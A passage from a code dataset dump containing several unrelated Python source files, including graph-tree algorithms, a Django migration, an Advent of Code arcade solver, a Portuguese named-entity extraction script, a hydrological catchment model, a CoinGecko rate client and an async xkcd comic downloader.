-> Node:\n \"\"\"\"\"\"\n if self.__root is None:\n self.__root = self.get_root()\n return self.__root\n\n def height_of(self, n: Node) -> int:\n \"\"\"!\"\"\"\n if not BaseGraphOps.is_in(self, n):\n raise ValueError(\"node not in tree\")\n nid = n.id()\n return self.topsort[nid]\n\n def _is_closure_of(\n self, x: Node, y: Node, fn: Callable[[int, int], bool]\n ) -> bool:\n \"\"\"\"\"\"\n xheight = self.height_of(x)\n yheight = self.height_of(y)\n f = fn(xheight, yheight)\n print(f)\n print(x)\n print(y)\n return f\n\n def is_upclosure_of(self, x_src: Node, y_dst: Node) -> bool:\n \"\"\"!\n From Diestel 2017, p. 15\n is x upclosure of y\n \"\"\"\n xheight = self.height_of(x_src)\n yheight = self.height_of(y_dst)\n return yheight >= xheight\n\n def is_downclosure_of(self, x_src: Node, y_dst: Node) -> bool:\n \"\"\"!\n From Diestel 2017, p. 15\n is x down closure of y\n \"\"\"\n xheight = self.height_of(x_src)\n yheight = self.height_of(y_dst)\n return yheight <= xheight\n\n def upset_of(self, n: Node) -> Set[Node]:\n \"\"\"!\n From Diestel 2017, p. 15\n \"\"\"\n return self.is_set_of(n, fn=self.is_upclosure_of)\n\n def downset_of(self, n: Node) -> Set[Node]:\n \"\"\"!\n From Diestel 2017, p. 15\n \"\"\"\n return self.is_set_of(n, fn=self.is_downclosure_of)\n\n def is_set_of(\n self, n: Node, fn: Callable[[Node, Node], bool]\n ) -> Set[Node]:\n nodes = BaseGraphOps.nodes(self)\n nset = set([y for y in nodes if fn(n, y) is True])\n return nset\n\n def less_than_or_equal(self, first: Node, second: Node) -> bool:\n \"\"\"\"\"\"\n return self.height_of(first) <= self.height_of(second)\n\n def greater_than_or_equal(self, first: Node, second: Node) -> bool:\n \"\"\"\"\"\"\n return self.height_of(first) >= self.height_of(second)\n\n def nodes_per_level(self, level: int) -> Set[Node]:\n \"\"\"!\n extract nodes of certain level in tree\n \"\"\"\n return set(\n [n for n in BaseGraphOps.nodes(self) if self.height_of(n) == level]\n )\n\n def extract_path(\n self,\n start: Node,\n end: Node,\n filter_fn: Callable[[Set[Edge], str], Set[Edge]] = lambda es, n: set(\n [e for e in es if e.start().id() == n]\n ),\n costfn: Callable[[Edge, float], float] = lambda x, y: y + 1.0,\n is_min=True,\n ):\n \"\"\"\"\"\"\n if (\n BaseGraphOps.is_in(self, start) is False\n or BaseGraphOps.is_in(self, end) is False\n ):\n raise ValueError(\"start or end node is not inside tree\")\n #\n upset = self.upset_of(start)\n if end not in upset:\n raise ValueError(\"end node is not in upset of start.\")\n downset = self.downset_of(end)\n upset_edges = set()\n for u in upset:\n for e in BaseGraphOps.outgoing_edges_of(self, u):\n upset_edges.add(e)\n downset_edges = set()\n for d in downset:\n for e in BaseGraphOps.outgoing_edges_of(self, d):\n downset_edges.add(e)\n problem_set = upset_edges.intersection(downset_edges)\n ucs_path = Path.from_ucs(\n g=self,\n goal=end,\n start=start,\n filter_fn=filter_fn,\n costfn=costfn,\n is_min=is_min,\n problem_set=problem_set,\n )\n return ucs_path\n\n @classmethod\n def find_mst_prim(\n cls, g: BaseGraph, edge_generator: Callable[[Node], Set[Node]]\n ) -> AbstractTree:\n \"\"\"!\n Find minimum spanning tree as per Prim's algorithm\n Even and Guy Even 2012, p. 32\n \"\"\"\n l_e = 1 # length of an edge\n l_vs = {}\n vs = []\n eps = {}\n\n for v in g.V:\n l_vs[v] = math.inf\n vs.append(v)\n #\n s = vs[0]\n l_vs[s] = 0\n eps[s] = set()\n TEMP = vs.copy()\n T: Set[Edge] = set()\n while TEMP:\n minv = None\n minl = math.inf\n for v in TEMP:\n if l_vs[v] < minl:\n minl = l_vs[v]\n minv = v\n TEMP = [v for v in TEMP if v != minv]\n if minv is None:\n raise ValueError(\n \"Min vertex is not found. Graph is probably not connected\"\n )\n T = T.union(eps[minv])\n for edge in edge_generator(g.V[minv]):\n unode = edge.get_other(g.V[minv])\n u = unode.id()\n if u in TEMP and l_vs[u] > l_e:\n l_vs[u] = l_e\n eps[u] = set([edge])\n return cls.from_edgeset(eset=T)\n\n @classmethod\n def find_mnmx_st(\n cls,\n g: BaseGraph,\n edge_generator: Callable[[Node], Set[Edge]],\n weight_function: Callable[[Edge], float] = lambda x: 1,\n is_min: bool = True,\n ) -> Tuple[AbstractTree, List[Edge]]:\n \"\"\"!\n a modified version of kruskal minimum spanning tree adapted for\n finding minimum and maximum weighted spanning tree of a graph\n\n from Even and Guy Even 2012, p. 42\n \"\"\"\n queue = PriorityQueue(is_min=is_min)\n T: Set[Edge] = set()\n clusters = {v.id(): set([v]) for v in g.V}\n L: List[Edge] = []\n for edge in g.E:\n queue.insert(weight_function(edge), edge)\n #\n while len(queue) > 0:\n edge = None\n if is_min is True:\n k, edge = queue.min()\n else:\n k, edge = queue.max()\n #\n u = edge.start().id()\n v = edge.end().id()\n vset = clusters[v]\n uset = clusters[u]\n if vset != uset:\n T.add(edge)\n L.append(edge)\n clusters[v] = vset.union(uset)\n clusters[u] = vset.union(uset)\n return cls.from_edgeset(eset=T), L\n\n #\n def assign_num(\n self,\n v: str,\n num: Dict[str, int],\n visited: Dict[str, bool],\n parent: Dict[str, str],\n counter: int,\n generative_fn: Callable[[Node], Set[Node]],\n ):\n \"\"\"\"\"\"\n counter += 1\n num[v] = counter\n visited[v] = True\n vnode = self.V[v]\n for unode in generative_fn(vnode):\n u = unode.id()\n cond = visited.get(u)\n if cond is None or cond is False:\n parent[u] = v\n self.assign_num(\n u,\n num=num,\n generative_fn=generative_fn,\n visited=visited,\n parent=parent,\n counter=counter,\n )\n\n #\n def check_ap(\n self,\n v: str,\n num: Dict[str, int],\n visited: Dict[str, bool],\n parent: Dict[str, str],\n low: Dict[str, int],\n counter: int,\n aset: Set[str],\n generative_fn: Callable[[Node], Set[Node]],\n ):\n \"\"\"\"\"\"\n low[v] = num[v]\n vnode = self.V[v]\n for unode in generative_fn(vnode):\n u = unode.id()\n if num[u] >= num[v]:\n self.check_ap(\n v=u,\n num=num,\n visited=visited,\n parent=parent,\n low=low,\n counter=counter,\n generative_fn=generative_fn,\n aset=aset,\n )\n if low[u] >= num[v]:\n aset.add(v)\n #\n low[v] = min(low[v], low[u])\n elif parent[v] != u:\n low[v] = min(low[v], num[u])\n\n def find_separating_vertices(\n self, generative_fn: Callable[[Node], Set[Node]]\n ) -> Set[Node]:\n \"\"\"!\n find separating vertices of graph\n as in Erciyes 2018, p. 230, algorithm 8.3\n \"\"\"\n num: Dict[str, float] = {n: math.inf for n in self.V}\n low: Dict[str, float] = {n: math.inf for n in self.V}\n visited: Dict[str, bool] = {}\n parent: Dict[str, str] = {n: \"\" for n in self.V}\n aset: Set[str] = set()\n\n counter = 1\n v = [node for node in self.V][0]\n self.assign_num(\n v=v,\n num=num,\n visited=visited,\n parent=parent,\n counter=counter,\n generative_fn=generative_fn,\n )\n self.check_ap(\n v=v,\n num=num,\n visited=visited,\n generative_fn=generative_fn,\n parent=parent,\n low=low,\n counter=counter,\n aset=aset,\n )\n return set([self.V[a] for a in aset])\n","repo_name":"D-K-E/graphical-models","sub_path":"pygmodels/gmodel/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":12106,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"34716471510","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport oilserver.utils\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('oilserver', '0010_auto_20160404_2138'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='testcase',\n name='uuid',\n field=models.CharField(max_length=36, unique=True, help_text='UUID of this testcase.', default=oilserver.utils.generate_uuid),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='testcaseclass',\n name='uuid',\n field=models.CharField(max_length=36, unique=True, help_text='UUID of this testcaseclass.', default=oilserver.utils.generate_uuid),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='testframework',\n name='uuid',\n field=models.CharField(max_length=36, unique=True, help_text='UUID of this test framework and version.', default=oilserver.utils.generate_uuid),\n preserve_default=True,\n ),\n ]\n","repo_name":"autonomouse/dashboard","sub_path":"weebl/oilserver/migrations/0011_auto_20160404_2139.py","file_name":"0011_auto_20160404_2139.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21751456946","text":"from . import computer\n\n\ndef part1():\n \"\"\"\n The software draws tiles to the screen with output instructions:\n every three output instructions specify the x position (distance from the left), y position (distance from the top), and tile id.\n\n 0 is an empty tile. No game object appears in this tile.\n 1 is a wall tile. Walls are indestructible barriers.\n 2 is a block tile. Blocks can be broken by the ball.\n 3 is a horizontal paddle tile. The paddle is indestructible.\n 4 is a ball tile. The ball moves diagonally and bounces off objects.\n\n How many block tiles are on the screen when the game exits?\n \"\"\"\n program = read_input()\n output_values = []\n computer.run_program(program, [], output_values)\n blocks = output_values[2::3].count(2)\n print(blocks)\n\n\ndef part2():\n \"\"\"\n Memory address 0 represents the number of quarters that have been inserted; set it to 2 to play for free.\n The arcade cabinet has a joystick that can move left and right.\n If the joystick is in the neutral position, provide 0.\n If the joystick is tilted to the left, provide -1.\n If the joystick is tilted to the right, provide 1.\n When three output instructions specify X=-1, Y=0, the third output instruction is the new score.\n What is your score after the last block is broken?\n \"\"\"\n program = read_input()\n program[0] = 2\n input_values = []\n arcade = computer.get_computer(program, input_values)\n score = 0\n ball_x = 0\n paddle_x = 0\n while True:\n x = next(arcade)\n if type(x) == list: # When the game is finished and the program halts, the computer outputs the program state\n break\n y = next(arcade)\n v = next(arcade)\n if v == 3:\n paddle_x = x\n elif v == 4: # Every tick, the last value to be updated is that of the ball\n ball_x = x\n next_input = 0\n if ball_x < paddle_x:\n next_input = -1\n elif ball_x > paddle_x:\n next_input = 1\n input_values.append(next_input)\n if x == -1:\n score = v\n print(score)\n\n\ndef read_input():\n with open('input/day13.txt') as input_file:\n return [int(x) for x in input_file.readline().split(',')]\n","repo_name":"Metamess/AdventOfCode","sub_path":"2019/days/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3221607259","text":"from io import StringIO\nfrom fastapi import Depends\nimport pandas as pd\n\nfrom api.crud.crud import create_excerpt_metadata, create_named_entity\nfrom api.model.schemas import ExcerptMetadataCreate, NamedEntityCreate\n\nfrom database.connection import SessionLocal\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n'''\nCitação de projeto utilizado: https://github.com/neuralmind-ai/portuguese-bert\n@InProceedings{souza2020bertimbau,\n author=\"Souza, F{\\'a}bio and Nogueira, Rodrigo and Lotufo, Roberto\",\n editor=\"Cerri, Ricardo and Prati, Ronaldo C.\",\n title=\"BERTimbau: Pretrained BERT Models for Brazilian Portuguese\",\n booktitle=\"Intelligent Systems\",\n year=\"2020\",\n publisher=\"Springer International Publishing\",\n address=\"Cham\",\n pages=\"403--417\",\n isbn=\"978-3-030-61377-8\"\n}\n'''\n\nfrom transformers import BertForTokenClassification, DistilBertTokenizerFast, pipeline\n\nmodel = BertForTokenClassification.from_pretrained('pierreguillou/ner-bert-large-cased-pt-lenerbr')\ntokenizer = DistilBertTokenizerFast.from_pretrained('pierreguillou/bert-large-cased-pt-lenerbr'\n , model_max_length=512\n , do_lower_case=False\n )\nnlp = pipeline('ner', model=model, tokenizer=tokenizer, grouped_entities=True)\n\ndef find_people(id:str, text:str) -> list:\n\n result = nlp(str(text).replace('- ', ''))\n names = []\n lastIndex = 0\n\n for item in result:\n if item['entity_group'] == \"PESSOA\":\n if \"#\" in item['word'] and names != []:\n name = names[lastIndex]['content']\n name += item['word']\n names[lastIndex]['content'] = name.replace(\"#\", '')\n names[lastIndex]['end_offset'] = item['end']\n else:\n names.append({\n 'excerpt_id': id,\n 'content': item['word'],\n 'start_offset': item['start'],\n 'end_offset': 0,\n 'entity_type': 'PERSON'\n })\n lastIndex = len(names) - 1\n \n #if names != []:\n #print(names)\n return names\n\n### FOR TESTS PURPOSE ONLY ###\n\ndef execute_csv(file):\n \n contents = file.file.read()\n s = str(contents,'utf-8')\n data = StringIO(s)\n df = pd.read_csv(data)\n count_excerpt = 0\n count_named_entities = 0\n for index, row in df.iterrows():\n names = find_people(row['excerpt_id'], row['excerpt'])\n excerpt_metadata = ExcerptMetadataCreate(excerpt_id=row['excerpt_id'], uf=row['source_state_code'], cidade=row['source_territory_name'], tema=row['excerpt_subthemes'], data=row['source_created_at'])\n db_gen = get_db()\n db = next(db_gen)\n count_excerpt+=1 if (create_excerpt_metadata(db, excerpt_metadata)) else False\n if len(names) > 0:\n for name in names:\n item = NamedEntityCreate(excerpt_id=name['excerpt_id'], content=name['content'], start_offset=name['start_offset'], end_offset=name['end_offset'], entity_type=name['entity_type'])\n\n count_named_entities+=1 if (create_named_entity(db, item)) else False\n\n return \"Saved \" + str(count_excerpt) + \" excerpt ids and \" + str(count_named_entities) + \" named entitites\"","repo_name":"MLRG-CEFET-RJ/qdrec","sub_path":"scripts/bert_ner_processor.py","file_name":"bert_ner_processor.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11817378517","text":"# -*- coding: utf-8 -*-\nimport os, io, re, subprocess, copy, graphviz as gv, pandas as pd, matplotlib.pyplot as plt, numpy as np\nfrom scipy.interpolate import griddata\nfrom matplotlib.cm import ScalarMappable\nfrom matplotlib.colors import Normalize\n\nos.environ['PATH']=os.environ['PATH']+\";C:\\\\Program Files (x86)\\\\Graphviz2.38\\\\bin\"\n\nclass Catchment(object):\n \"\"\"\n Class for catchment implemented as a linked list\n \"\"\"\n def __init__(self):\n self.reaches = {}\n self.canStart = {}\n self.canBeCleaned = {}\n self.failed = {}\n self.nReachDone = 0\n self.ouletReaches = []\n self.inletReaches = []\n \n def addReach(self,ID, reachData, hydrologyMassLoadingsFileBase):\n \"\"\"\n Adds a reach to the catchment. \n \"\"\"\n self.reaches[ID] = Reach(ID, reachData, hydrologyMassLoadingsFileBase, self.signalStatusChange)\n\n def finalize(self):\n \"\"\"\n Finalize the catchment after all reaches have been added.\n Sets the links between the reaches.\n \"\"\"\n self.nReach = len(self.reaches)\n\n # The Directed Acyclic Graph specifying the watershed topology\n # A dict with for each reach a tuple with the downstream reaches\n self.directedGraph = {}\n\n for reach in self: # for every reach...\n for dId in list(reach.downstreamRef): # loop through downstream reaches\n if not dId in self.reaches.keys():\n # remove downstream reach if it is not in the catchment (e.g. if catchment is cropped)\n del(reach.downstreamRef[dId])\n reach.downstreamIDs.remove(dId)\n else:\n downstreamReach = self.reaches[dId]\n reach.set_downstreamRef(downstreamReach) # set reference to downstream reaches for this reach\n downstreamReach.set_upstreamRef(reach) # set upstream refence to this reach for downstream reaches\n downstreamReach.upstreamIDs.append(reach.ID)\n self.directedGraph[reach.ID] = (dId,)\n \n for reach in self:\n # determine the inlet and outlet reaches\n if len(reach.downstreamIDs)==0:\n self.ouletReaches.append(reach)\n if len(reach.upstreamIDs)==0:\n self.inletReaches.append(reach)\n\n # set the current status of the reaches and whether or not they have loading from upstream\n # checkstatus() and set_hasUpstreamLoading() propagate downward in the catchment so looping\n # over inlet reaches is sufficient\n for reach in self.inletReaches:\n reach.checkStatus()\n reach.set_hasUpstreamLoading()\n \n for reach in self:\n # set flag indicating whether mass outflow (MFU) file is Needed\n reach.set_massOutflowFileNeeded()\n\n \n def __iter__(self):\n \"\"\"\n Returns iterator over reaches\n \"\"\"\n return(iter(self.reaches.values()))\n\n @property\n def reachIDs(self):\n \"\"\"\n Returns list of reach IDs\n \"\"\"\n return(list(self.reaches.keys()))\n\n def __getitem__(self,ID):\n \"\"\"\n Returns reach for specified ID. ID may be a dict key, a index, or a slice\n \"\"\"\n if isinstance(ID, int):\n return(list(self.reaches.values())[ID])\n elif isinstance(ID,slice):\n return(list(self.reaches.values())[ID])\n else:\n return(self.reaches[ID])\n\n def __getattr__(self,name):\n \"\"\"\n Returns a dict for all reaches with reachIDs as keys and attribute \n name as values. If an attribute accessed that is not a member of Catchment, this\n function is called. This allows reach attribute prop to be accessed as\n catchment.prop, provided that prop is not an attribute of catchement.\n \"\"\"\n return({reach.ID: getattr(reach,name) for reach in self})\n\n def signalStatusChange(self,reach):\n \"\"\"\n Called by reaches to inform the catchment object of a status change.\n This is used to maintain a list of reaches that can start.\n \"\"\"\n if reach.stat == Reach.flagCanStart:\n self.canStart[reach.ID] = reach\n elif reach.stat == Reach.flagRunning:\n if reach.ID in self.canStart: del self.canStart[reach.ID]\n elif reach.stat == Reach.flagCanBeCleaned:\n self.canBeCleaned[reach.ID] = reach\n elif reach.stat == Reach.flagCleaning:\n del self.canBeCleaned[reach.ID]\n elif reach.stat == Reach.flagDone:\n self.nReachDone += 1\n elif reach.stat in [Reach.flagError, Reach.flagUpstreamError]:\n if reach.ID in self.canStart: del self.canStart[reach.ID]\n self.failed[reach.ID] = reach\n\n @property\n def canStartReaches(self):\n return([reach for reach in self.canStart.values()])\n\n @property\n def canBeCleanedReaches(self):\n return([reach for reach in self.canBeCleaned.values()])\n\n @property\n def failedList(self):\n return self.failed\n\n def getReachProp(self, prop, reachIds = None):\n \"\"\"\n Returns reach property for all, or a selection of reaches\n \"\"\"\n return([reach.getProperty(prop) for reach in self])\n\n @property\n def isDone(self):\n return self.nReachDone==len(self.reaches)\n\n def catchmentMap(self, colorVals = None, valRange = [0,1], fileName = None, title = None, linewidth = 5):\n withnames = False\n #create figure object and color map\n fig = plt.figure(figsize=(12,12))\n ax = fig.add_subplot(111)#, projection=\"3d\")\n ax.set_xlabel(\"X [m]\")\n ax.set_ylabel(\"Y [m]\")\n ax.grid(True)\n \n if type(colorVals) == list:\n cmap = ScalarMappable(cmap='jet',norm = Normalize(valRange[0],valRange[1]))\n cmap.set_array(valRange)\n colorFcn = lambda x: '#%02x%02x%02x' % cmap.to_rgba(x,bytes=True)[0:3]\n else:\n cmap = None\n colorVals = [colorVals]*len(self.reaches)\n colorFcn = lambda x: colorVals[0]\n \n # plot reaches\n for index, reach in enumerate(self): \n for downstream_reach in reach.downstreamRefs:\n ax.plot([reach.x,downstream_reach.x],[reach.y,downstream_reach.y],color=colorFcn(colorVals[index]), linewidth = linewidth) \n if withnames:\n x_coord = (reach.x+downstream_reach.x)/2. \n y_coord = (reach.y+downstream_reach.y)/2. \n ax.text(x_coord,y_coord,reach.key, verticalalignment='bottom', horizontalalignment='right',\n color=fontcolor, fontsize=fontsize, \n bbox=dict(facecolor=color_waterbody, edgecolor='None', boxstyle='round,pad=.2',alpha=.5))\n \n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n if not cmap is None: \n cbar = plt.colorbar(cmap, ax = ax)\n cbar.ax.tick_params(labelsize=15) \n if not title is None: plt.title(title,fontsize=18)\n if not fileName is None:\n plt.savefig(os.path.join(fileName))\n plt.close()\n\n \n def catchmentGraph(self, colorVals = None, colorMap = 'jet', range = [0,1], format = 'pdf', fileName = 'graph'):\n # Makes a graph of the reaches and their connections with graphviz.\n dot = gv.Digraph(engine= 'dot')\n dot.attr('graph', nodesep='1',ranksep = '0.005', margin = '0')\n dot.attr('node', margin = '0',fixedsize = 'false', fontsize = '6',width = '0.1',\n height = '0.05', shape = 'box', style = 'filled', penwidth = '0.0')\n dot.attr('edge', arrowsize = '0.2', penwidth = '0.25')\n\n if not colorVals is None:\n cmap = ScalarMappable(cmap=colorMap,norm = Normalize(range[0],range[1]))\n colorFcn = lambda x: '#%02x%02x%02x' % cmap.to_rgba(x,bytes=True)[0:3]\n else:\n colorFcn = lambda x: None\n colorVals = [0]*self.nReach\n \n for idx, reach in enumerate(self):\n dot.node(reach.ID,label = reach.ID, fillcolor = colorFcn(colorVals[idx])) # add node/reach\n if len(reach.downstreamRef)>0: # add connections to down stream\n dot.edge(reach.ID, list(reach.downstreamRefs)[0].ID, weight = '10')\n try:\n dot.render(filename=fileName, format = format, renderer=None, formatter=None)\n except:\n pass\n\nclass Reach(object):\n \"\"\"\n Class for reach.\n \"\"\"\n\n # Status flags\n flagWaiting = 0\n flagCanStart = 1\n flagRunning = 2\n flagRunDone = 3\n flagCanBeCleaned = 4\n flagCleaning = 5\n flagDone = 6\n flagError = 7\n flagUpstreamError = 8\n\n def __init__(self, ID, reachData, hydrologyMassLoadingsFileBase, signalStatusChange):\n \"\"\"\n Creats a reach object.\n \"\"\"\n if not type(reachData.RchIDDwn) is list: reachData.RchIDDwn = [reachData.RchIDDwn]\n self.ID = ID\n self.hydrologyMassLoadingsFile = ID + hydrologyMassLoadingsFileBase\n self.length = reachData.Len\n self.downstreamIDs = reachData.RchIDDwn\n self.upstreamIDs = []\n self.downstreamRef = {ID:None for ID in reachData.RchIDDwn}\n self.upstreamRef = {}\n self.width = reachData.WidWatSys\n self.slope = reachData.SloSidWatSys\n self.suspSolids = reachData.ConSus\n self.omSuspSolids = reachData.CntOmSusSol\n self.bulkDens = reachData.Rho\n self.porosity = reachData.ThetaSat\n self.omSediment = reachData.CntOM\n self.nSegments = 1\n self.signalStatusChange = signalStatusChange\n self.stat = Reach.flagWaiting\n self.hasDrift = reachData.Expsd\n self.hasUpstreamLoading = False\n self.x = reachData.X\n self.y = reachData.Y\n self.massOutflowFileNeeded = None\n\n def unlink(self):\n \"\"\"\n Returns an \"unlinked\" copy of the reach, with all references to other reaches and the catchment set to None.\n \"\"\"\n cp = copy.copy(self)\n cp.downstreamRef = None\n cp.upstreamRef = None\n cp.signalStatusChange = None\n return(cp)\n\n def set_downstreamRef(self,reach):\n \"\"\"\n Sets the reference to a single downstream reach.\n \"\"\"\n if self.downstreamRef[reach.ID] is None: self.downstreamRef[reach.ID] = reach\n\n def set_upstreamRef(self,reach):\n \"\"\"\n Sets the reference to a single upstream reach.\n \"\"\"\n if not reach.ID in self.upstreamRef.keys(): self.upstreamRef[reach.ID] = reach\n\n @property\n def status(self):\n \"\"\"\n Returns the status of this reach.\n If the status waiting, it will be updated first, by checking the upstream reaches.\n NB: this function has the property decorator, meaning that if the reach status is \n accessed as reach.status, this function will be called.\n \"\"\"\n if self.stat == Reach.flagWaiting: self.checkStatus()\n return(self.stat)\n\n @status.setter\n def status(self, status):\n \"\"\"\n Sets status of this reach.\n If the status is done, the downstream reaches will be asked to update their status as well.\n If the status is (upstream)error: all downstream reaches will get upstream error.\n NB: this function has the setter decorator, meaning that if a reach status is set using \n reach.status = status, this function will be called.\n \"\"\"\n self.stat = status\n if not self.signalStatusChange is None: self.signalStatusChange(self)\n if status in [Reach.flagError, Reach.flagUpstreamError]:\n for reach in self.downstreamRefs: reach.status = Reach.flagUpstreamError\n elif status == Reach.flagRunDone:\n for reach in self.downstreamRefs: reach.checkStatus()\n for reach in self.upstreamRefs: reach.checkStatus()\n self.checkStatus()\n \n @property\n def upstreamRefs(self):\n \"\"\"\n Returns iterator over upstream reaches\n \"\"\"\n return(iter(self.upstreamRef.values()))\n\n @property\n def downstreamRefs(self):\n \"\"\"\n Returns iterator over downstream reaches\n \"\"\"\n return(iter(self.downstreamRef.values()))\n\n @property\n def skip(self):\n return(not(self.hasUpstreamLoading or self.hasDrift))\n\n def waterResidenceTime(self,waterDepth,flowRate):\n return self.waterVolume(waterDepth)/flowRate\n\n def waterVolume(self,waterDepth):\n return self.waterCrossSectionArea(waterDepth)*self.length\n\n def waterCrossSectionArea(self,waterDepth):\n return waterDepth*(self.width + waterDepth*self.slope)\n\n def checkStatus(self):\n \"\"\"\n Checks status for this reach, by looking at the upstream and downstream reaches.\n If the current status is runDone and all downstream reaches are runDone as well, the status\n is set to canBeCleaned. \n If the status is all upstream reaches have status runDone or done, this reach will get status canStart.\n If any of the upstream reaches has status (upstream)error this reach will get status upstreamError\n \"\"\"\n\n if self.stat == Reach.flagRunDone:\n if not self.downstreamRefs or all([reach.status in [Reach.flagRunDone, Reach.flagDone] for reach in self.downstreamRefs]):\n self.status = Reach.flagCanBeCleaned\n elif self.stat == Reach.flagWaiting:\n if not self.upstreamRef or all([reach.status in [Reach.flagRunDone, Reach.flagDone] for reach in self.upstreamRefs]):\n self.status = Reach.flagCanStart\n elif any([reach.status in [Reach.flagError, Reach.flagUpstreamError] for reach in self.upstreamRefs]):\n self.status = Reach.flagUpstreamError\n\n def set_hasUpstreamLoading(self,flag = False):\n self.hasUpstreamLoading = flag or self.hasUpstreamLoading\n for reach in self.downstreamRefs:\n reach.set_hasUpstreamLoading(self.hasUpstreamLoading or self.hasDrift)\n\n def set_massOutflowFileNeeded(self):\n self.massOutflowFileNeeded = any([not reach.skip for reach in self.downstreamRefs])","repo_name":"xlandscape/CascadeToxswa-Component","sub_path":"module/src/Catchment.py","file_name":"Catchment.py","file_ext":"py","file_size_in_byte":14295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28082961058","text":"import os\nfrom setuptools import setup, find_packages\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\nwith open('requirements.txt') as f:\n install_requires = f.read().splitlines()\n\nsetup(\n name='django-simple-activity',\n version='1.1.1.dev0',\n packages=find_packages('src', exclude=('tests',)),\n package_dir={'': 'src'},\n include_package_data=True,\n license='Apache 2.0',\n description=(\n 'Simple, generic, activity streams '\n 'from the actions on your site.'),\n url='https://github.com/richardasaurus/django-simple-activity',\n author='Richard O\\'Dwyer',\n author_email='richard@richard.do',\n zip_safe=True,\n install_requires=install_requires\n)\n","repo_name":"richardARPANET/django-simple-activity","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8701903908","text":"import requests\n\nfrom clients.currency.coingecko.defs import CoinGeckoCrypto\nfrom clients.currency.coingecko.exceptions import CoinGeckoRequestException\nfrom moneybox.settings import COINGECKO_URL, COINGECKO_TIMEOUT\nfrom wallet.models.currency import FiatCurrency\n\n\nclass CoinGeckoClient:\n def __init__(self, url: str = COINGECKO_URL, timeout: int = COINGECKO_TIMEOUT) -> None:\n self.url = url\n self.timeout = timeout\n\n def get_rates(self):\n try:\n response = requests.get(\n url=self.url.format(\n crypto_currencies=\",\".join(CoinGeckoCrypto.map_main_crypto_to_coingecko().values()),\n fiat_currency=FiatCurrency.RUB,\n ),\n timeout=self.timeout,\n )\n rates = response.json()\n except requests.exceptions.RequestException as e:\n raise CoinGeckoRequestException(e)\n result = dict()\n for k, v in rates.items():\n result[CoinGeckoCrypto.map_coingecko_to_main_crypto(k)] = round(v.get(FiatCurrency.RUB.lower()), 4)\n return result\n\n\ncoingecko_client = CoinGeckoClient()\n","repo_name":"tanja-ovc/django-moneybox","sub_path":"moneybox/clients/currency/coingecko/coingecko.py","file_name":"coingecko.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"20351688594","text":"import sys\nimport heapq\n\ninput = sys.stdin.readline\n\n\nclass Voca:\n def __init__(self, voca):\n self.voca = voca\n\n def __lt__(self, other):\n return self.voca.lower() < other.voca.lower()\n\n\nif __name__ == \"__main__\":\n while True:\n t = int(input().strip())\n if t == 0:\n break\n que = []\n for _ in range(t):\n voca = Voca(input().strip())\n heapq.heappush(que, voca)\n answer: Voca = heapq.heappop(que)\n print(answer.voca)\n","repo_name":"Alphanewbie/TIL","sub_path":"Algorithm_problem_solving/Baek-joon/2204/2204.py","file_name":"2204.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17416527332","text":"import aiohttp\nimport asyncio\nimport time\n\nrecord=open(\"Task2_AsyncTime.txt\",\"w\")\nfilename = \"Task2_Async.txt\" # create a file with a unique name\nf=open(filename,'a') #APPENDING A SINGLE FILE SINCE I'M NOT SURE IF CREATING 200 FILES WOULD BE A GOOD IDEA\n\nasync def getOnePage(session,comic_id: int):\n url = f\"https://xkcd.com/{comic_id}/info.0.json\"\n async with session.get(url) as sesh:\n content=await sesh.read()\n print(content,file=f) #writing contents into the file one by one here\n print(f\"Begin downloading {url}\")\n result=await sesh.json()\n print(f\"Finished downloading {url}\")\n return result\n\nasync def getAllPages(session):\n tasks=[] #creating a dynamic array to store all the tasks we want to rin parallely\n for i in range(1,201): #will take values 1-200 in loop\n task=asyncio.create_task(getOnePage(session,i))\n tasks.append(task)\n \n \n results= await asyncio.gather(*tasks) #pointing to the list so that all the members are defined as async task\n return results\n\nasync def Main():\n async with aiohttp.ClientSession() as sesh:\n downloads = await getAllPages(sesh)\n return downloads\n\n\nif __name__ == \"__main__\":\n start=time.time()\n finalresult=asyncio.run(Main())\n timeTaken=time.time()-start\n print(f\"Time taken= {timeTaken:0.2f} seconds\")\n record.writelines(str(timeTaken)+\"\\n\")\n record.close\n\n\n\n \n","repo_name":"JebronLames32/KOSS_Task","sub_path":"Task2/Task1_Writeinfile_async.py","file_name":"Task1_Writeinfile_async.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27986984594","text":"''' Google API-based feature extraction classes. '''\n\nimport logging\nimport time\nimport warnings\nimport os\nfrom collections import defaultdict\n\nimport numpy as np\nimport pandas as pd\n\nfrom pliers.extractors.image import ImageExtractor\nfrom pliers.extractors.text import TextExtractor\nfrom pliers.extractors.video import VideoExtractor\nfrom pliers.transformers import 